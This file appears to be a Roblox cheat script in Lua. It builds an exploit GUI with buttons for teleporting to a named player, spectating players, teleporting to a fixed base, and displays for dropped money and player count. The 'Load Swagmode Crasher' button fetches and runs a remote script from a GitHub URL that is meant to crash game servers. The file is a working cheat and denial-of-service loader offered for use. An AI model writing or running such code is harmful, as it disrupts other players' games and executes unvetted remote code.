local ScreenGui = Instance.new("ScreenGui")
local Frame = Instance.new("Frame")
local RainbotShit = Instance.new("Frame")
local Frame_2 = Instance.new("Frame")
local TARGETTEXTBOX = Instance.new("TextBox")
local Goto = Instance.new("TextButton")
local A_VIEW = Instance.new("TextButton")
local ADminBase = Instance.new("TextButton")
local TextButton = Instance.new("TextButton")
local TextLabel = Instance.new("TextLabel")
local TextLabel_2 = Instance.new("TextLabel")
local TextLabel_3 = Instance.new("TextLabel")
ScreenGui.Parent = game.CoreGui
ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
Frame.Parent = ScreenGui
Frame.BackgroundColor3 = Color3.fromRGB(0, 0, 0)
Frame.BorderSizePixel = 0
Frame.Position = UDim2.new(0.412766039, 0, 0.364021152, 0)
Frame.Size = UDim2.new(0, 244, 0, 257)
RainbotShit.Name = "RainbotShit"
RainbotShit.Parent = Frame
RainbotShit.BackgroundColor3 = Color3.fromRGB(255, 0, 0)
RainbotShit.BorderColor3 = Color3.fromRGB(25, 25, 25)
RainbotShit.BorderSizePixel = 0
RainbotShit.Position = UDim2.new(2.50144069e-07, 0, 0.06585446, 0)
RainbotShit.Size = UDim2.new(0, 243, 0, 206)
Frame_2.Parent = RainbotShit
Frame_2.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
Frame_2.BorderColor3 = Color3.fromRGB(25, 25, 25)
Frame_2.BorderSizePixel = 0
Frame_2.Position = UDim2.new(-2.51173475e-07, 0, -0.0821582079, 0)
Frame_2.Size = UDim2.new(0, 243, 0, 221)
TARGETTEXTBOX.Name = "TARGETTEXTBOX"
TARGETTEXTBOX.Parent = Frame_2
TARGETTEXTBOX.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
TARGETTEXTBOX.BorderSizePixel = 0
TARGETTEXTBOX.Position = UDim2.new(0.0315333232, 0, 0.048780486, 0)
TARGETTEXTBOX.Size = UDim2.new(0, 228, 0, 37)
TARGETTEXTBOX.Font = Enum.Font.Code
TARGETTEXTBOX.PlaceholderColor3 = Color3.fromRGB(178, 178, 178)
TARGETTEXTBOX.PlaceholderText = "Player's Name"
TARGETTEXTBOX.Text = ""
TARGETTEXTBOX.TextColor3 = Color3.fromRGB(255, 255, 255)
TARGETTEXTBOX.TextSize = 15.000
Goto.Name = "Goto"
Goto.Parent = Frame_2
Goto.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
Goto.BorderSizePixel = 0
Goto.Position = UDim2.new(0.0260205679, 0, 0.286232919, 0)
Goto.Size = UDim2.new(0, 228, 0, 30)
Goto.Font = Enum.Font.SourceSans
Goto.Text = "GoTo"
Goto.TextColor3 = Color3.fromRGB(255, 255, 255)
Goto.TextSize = 15.000
A_VIEW.Name = "A_VIEW"
A_VIEW.Parent = Frame_2
A_VIEW.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
A_VIEW.BorderSizePixel = 0
A_VIEW.Position = UDim2.new(0.0260205679, 0, 0.468111336, 0)
A_VIEW.Size = UDim2.new(0, 228, 0, 30)
A_VIEW.Font = Enum.Font.SourceSans
A_VIEW.Text = "View"
A_VIEW.TextColor3 = Color3.fromRGB(255, 255, 255)
A_VIEW.TextSize = 15.000
ADminBase.Name = "ADminBase"
ADminBase.Parent = Frame_2
ADminBase.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
ADminBase.BorderSizePixel = 0
ADminBase.Position = UDim2.new(0.0260205679, 0, 0.649989724, 0)
ADminBase.Size = UDim2.new(0, 228, 0, 30)
ADminBase.Font = Enum.Font.SourceSans
ADminBase.Text = "Admin Base"
ADminBase.TextColor3 = Color3.fromRGB(255, 255, 255)
ADminBase.TextSize = 15.000
TextButton.Parent = Frame_2
TextButton.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
TextButton.BorderSizePixel = 0
TextButton.Position = UDim2.new(0.0260205679, 0, 0.831868052, 0)
TextButton.Size = UDim2.new(0, 228, 0, 30)
TextButton.Font = Enum.Font.SourceSans
TextButton.Text = "Load Swagmode Crasher"
TextButton.TextColor3 = Color3.fromRGB(255, 255, 255)
TextButton.TextSize = 15.000
TextLabel.Parent = Frame
TextLabel.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.BackgroundTransparency = 1.000
TextLabel.Position = UDim2.new(0, 0, 0.867410719, 0)
TextLabel.Size = UDim2.new(0, 107, 0, 34)
TextLabel.Font = Enum.Font.Code
TextLabel.Text = "$100,000,000"
TextLabel.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel.TextSize = 15.000
TextLabel.TextXAlignment = Enum.TextXAlignment.Left
TextLabel_2.Parent = Frame
TextLabel_2.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.BackgroundTransparency = 1.000
TextLabel_2.Position = UDim2.new(0.438524604, 0, 0.867410719, 0)
TextLabel_2.Size = UDim2.new(0, 93, 0, 34)
TextLabel_2.Font = Enum.Font.Code
TextLabel_2.Text = "Count Player:"
TextLabel_2.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_2.TextSize = 14.000
TextLabel_2.TextXAlignment = Enum.TextXAlignment.Left
TextLabel_3.Parent = Frame
TextLabel_3.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.BackgroundTransparency = 1.000
TextLabel_3.Position = UDim2.new(0.819556296, 0, 0.867410719, 0)
TextLabel_3.Size = UDim2.new(0, 22, 0, 34)
TextLabel_3.Font = Enum.Font.Code
TextLabel_3.Text = "38"
TextLabel_3.TextColor3 = Color3.fromRGB(255, 255, 255)
TextLabel_3.TextSize = 14.000
TextLabel_3.TextXAlignment = Enum.TextXAlignment.Left
-- Scripts:
local function SRXFBY_fake_script() 
	local script = Instance.new('LocalScript', RainbotShit)
	function zigzag(X) return math.acos(math.cos(X*math.pi))/math.pi end
	counter = 0
	while wait(0)do
		script.Parent.BackgroundColor3 = Color3.fromHSV(zigzag(counter),1,1)
		counter = counter + 0.01
	end
end
coroutine.wrap(SRXFBY_fake_script)()
local function LBHCX_fake_script()
	local script = Instance.new('LocalScript', Goto)
	script.Parent.MouseButton1Down:Connect(function()
		game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = CFrame.new(game.Players[TARGETTEXTBOX.Text].Character.UpperTorso.Position)
	end)
end
coroutine.wrap(LBHCX_fake_script)()
local function BYKOHRI_fake_script() 
	local script = Instance.new('LocalScript', A_VIEW)

	script.Parent.MouseButton1Click:connect(function()
		if A_VIEW.Text == 'VIEW' then
			A_VIEW.Text = 'UNVIEW'
			repeat view(TARGETTEXTBOX.Text) until A_VIEW.Text == 'VIEW'
			game.Workspace:FindFirstChildWhichIsA('Camera').CameraSubject = game.Players.LocalPlayer.Character:FindFirstChildWhichIsA('Humanoid')
		else
			A_VIEW.Text = 'VIEW'
		end
	end)
	function view(plr)
		wait()
		if game.Players:FindFirstChild(plr) then
			if game.Players[plr].Character then
				game.Workspace:FindFirstChildWhichIsA('Camera').CameraSubject = game.Players:FindFirstChild(plr).Character.HumanoidRootPart
			else
				A_VIEW.Text = 'VIEW'
			end
		else
			A_VIEW.Text = 'VIEW'
		end
	end
end
coroutine.wrap(BYKOHRI_fake_script)()
local function WXSVDO_fake_script()
	local script = Instance.new('LocalScript', ADminBase)
	script.Parent.MouseButton1Down:Connect(function()
		game.Players.LocalPlayer.Character:FindFirstChild('HumanoidRootPart').CFrame = CFrame.new(-872.030029296875, -38.401187896728516, -585.260009765625)
	end)
end
coroutine.wrap(WXSVDO_fake_script)()
local function FKKSHOA_fake_script()
	local script = Instance.new('LocalScript', TextButton)
	script.Parent.MouseButton1Down:Connect(function()
		loadstring(game:HttpGet('https://raw.githubusercontent.com/lerkermer/lua-projects/master/SuperCustomServerCrasher'))()
	end)
end
coroutine.wrap(FKKSHOA_fake_script)()
local function DVVO_fake_script()
	local script = Instance.new('LocalScript', TextLabel)
	while wait() do
		pcall(function()
			local amount = 0
			for i,v in pairs(game.Workspace.Ignored.Drop:GetChildren()) do
				if v.Name == "MoneyDrop" then
					local cash = string.split(v.BillboardGui.TextLabel.Text,"$")[2]
					if string.match(cash,',') then
						amount = amount + cash:gsub("%,","")
					else
						amount = amount + cash
					end
				end
			end
			local function checking(amount)
				amount = tostring(amount)
				return amount:reverse():gsub("%d%d%d", "%1,"):reverse():gsub("^,", "")
			end
			script.Parent.Text = "$"..checking(amount).." dropped"
		end)
	end
end
coroutine.wrap(DVVO_fake_script)()
local function HDHONK_fake_script() -- TextLabel_2.LocalScript 
	local script = Instance.new('LocalScript', TextLabel_2)
	while wait() do
		pcall(function()
			local amount = 0
			for i,v in pairs(game.Workspace.Ignored.Drop:GetChildren()) do
				if v.Name == "MoneyDrop" then
					local cash = string.split(v.BillboardGui.TextLabel.Text,"$")[2]
					if string.match(cash,',') then
						amount = amount + cash:gsub("%,","")
					else
						amount = amount + cash
					end
				end
			end
			local function checking(amount)
				amount = tostring(amount)
				return amount:reverse():gsub("%d%d%d", "%1,"):reverse():gsub("^,", "")
			end
			script.Parent.Text = "$"..checking(amount).." dropped"
		end)
	end
end
coroutine.wrap(HDHONK_fake_script)()
local function ZQWDWR_fake_script() -- TextLabel_3.LocalScript 
	local script = Instance.new('LocalScript', TextLabel_3)

	while wait() do
		pcall(function()
			local amount = 0
			for i,v in pairs(game.Workspace.Ignored.Drop:GetChildren()) do
				if v.Name == "MoneyDrop" then
					local cash = string.split(v.BillboardGui.TextLabel.Text,"$")[2]
					if string.match(cash,',') then
						amount = amount + cash:gsub("%,","")
					else
						amount = amount + cash
					end
				end
			end
			local function checking(amount)
				amount = tostring(amount)
				return amount:reverse():gsub("%d%d%d", "%1,"):reverse():gsub("^,", "")
			end
			script.Parent.Text = "$"..checking(amount).." dropped"
		end)
	end
end
coroutine.wrap(ZQWDWR_fake_script)()
local function BBTWU_fake_script() -- TextLabel_3.LocalScript 
	local script = Instance.new('LocalScript', TextLabel_3)

	while true do
		script.Parent.Text = ""..game.Players.NumPlayers
		wait(1)
	end
end
coroutine.wrap(BBTWU_fake_script)()
local function RLZMW_fake_script() -- Frame.LocalScript 
	local script = Instance.new('LocalScript', Frame)

	local UIS = game:GetService('UserInputService')
	local frame = script.Parent
	local dragToggle = nil
	local dragSpeed = 0.25
	local dragStart = nil
	local startPos = nil
	
	local function updateInput(input)
		local delta = input.Position - dragStart
		local position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X,
			startPos.Y.Scale, startPos.Y.Offset + delta.Y)
		game:GetService('TweenService'):Create(frame, TweenInfo.new(dragSpeed), {Position = position}):Play()
	end
	frame.InputBegan:Connect(function(input)
		if (input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch) then 
			dragToggle = true
			dragStart = input.Position
			startPos = frame.Position
			input.Changed:Connect(function()
				if input.UserInputState == Enum.UserInputState.End then
					dragToggle = false
				end
			end)
		end
	end)
	UIS.InputChanged:Connect(function(input)
		if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
			if dragToggle then
				updateInput(input)
			end
		end
	end)
end
coroutine.wrap(RLZMW_fake_script)()
